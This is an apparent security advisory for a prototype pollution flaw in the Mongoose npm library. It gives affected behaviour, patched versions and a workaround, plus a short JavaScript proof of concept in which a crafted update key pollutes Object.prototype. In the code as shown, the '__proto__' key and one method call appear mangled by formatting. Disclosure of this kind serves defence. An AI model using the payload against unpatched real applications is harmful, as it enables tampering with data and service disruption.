PT-2026-67473 · Npm · Mongoose

Publicado

2026-07-24

·

Atualizado

2026-07-24

CVSS v3.1

6.5

Média

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Impact

What kind of vulnerability is it? Who is impacted?
Prototype pollution in update casting: passing a user-controlled update to a Mongoose update, like MyModel.updateOne(filter, req.body), can cause Mongoose to set $fullPath and $parentSchemaDocArray on Object.prototype.
Example:
javascript
const mongoose = require('mongoose');
console.log('before:', Object.prototype.$fullPath);      // undefined

const User = mongoose.model('User', new mongoose.Schema({ name: String }));
const malicious = JSON.parse('{"$set": {" proto .x": "anything"}}');  // attacker-controlled update

const q = User.updateOne({}, {});
try { q. castUpdate(malicious); } catch (e) { /* throws AFTER the pollution side-effect */ }

console.log('after :', Object.prototype.$fullPath);      // " proto "
console.log('enumerable:', Object.prototype.propertyIsEnumerable('$fullPath')); // true
console.log('fresh {}:', ({}).$fullPath);           // " proto "

Patches

Has the problem been patched? What versions should users upgrade to?
9.7.2, 8.24.1. 7.8.10, 6.13.10

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?
Check user-controlled updates for own proto properties before passing to Mongoose

References

Are there any links users can visit to find out more?

Correção

Prototype Pollution

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

GHSA-664H-WQGQ-64GW

Produtos afetados

Mongoose